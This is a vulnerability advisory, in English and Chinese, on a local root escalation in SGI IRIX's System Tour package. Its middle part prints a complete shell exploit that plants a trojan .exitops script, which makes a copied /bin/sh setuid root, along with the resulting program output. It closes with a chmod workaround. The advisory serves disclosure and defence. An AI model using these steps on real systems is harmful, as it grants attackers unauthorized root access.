[原文]Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 allows local users to gain root privileges via a Trojan horse .exitops program, which is called by the inst command that is executed by the RemoveSystemTour program.
[CNNVD]IRIX SGI系统tour数据包(systour) Indigo Magic System Tour权限许可和访问控制漏洞(CNNVD-199610-009)
IRIX 5.x至6.3版本的SGI系统tour数据包(systour)中的Indigo Magic System Tour存在漏洞。本地用户可以借助一个Trojan horse .exitops程序获取根权限，该程序由RemoveSystemTour程序执行的inst命令请求运行。
A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.
$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:
#/bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
#/bin/chmod u-s /usr/people/tour/oob/bin/oobversions